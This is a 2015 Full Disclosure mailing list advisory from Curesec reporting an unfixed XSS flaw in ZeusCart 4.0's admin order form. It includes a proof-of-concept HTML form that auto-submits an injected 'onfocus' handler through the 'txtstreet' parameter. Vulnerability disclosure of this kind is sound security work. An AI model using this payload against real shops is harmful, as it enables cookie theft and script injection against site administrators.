lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <55F6F352.9030504@curesec.com>
Date: Mon, 14 Sep 2015 18:18:26 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] ZeusCart 4.0 - XSS - not fixed

ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team
1. Introduction

Affected Product: 	ZeusCart 4.0	
Fixed in: 		not fixed
Fixed Version Link: 	n/a	
Vendor Contact: 	support@...scart.com	
Vulnerability Type: 	XSS	
Remote Exploitable: 	Yes	
Reported to vendor: 	08/13/2015	
Disclosed to public: 	09/14/2015	
Release mode: 		Full Disclosure	
CVE: 			n/a	
Credits 		Tim Coen of Curesec GmbH	

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when
adding a new order. With this, it is possible to steal cookies or inject
JavaScript keyloggers.
2. Proof of Concept


        <form name="myform" method="post"
action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create"
>
            <input type="hidden" name="hidOrderTotal" value="400">
            <input type="hidden" name="discount" value="flat">
            <input type="hidden" name="selCustomer" value="1">
            <input type="hidden" name="payOption" value="8">
            <input type="hidden" name="txtname" value="Primary">
            <input type="hidden" name="txtstreet" value="foo autofocus
onfocus=alert(1); bar">
        </form>
        <script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 	Informed Vendor about Issue (no reply)
09/07/2015 	Reminded Vendor of release date (no reply)
09/14/2015 	Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists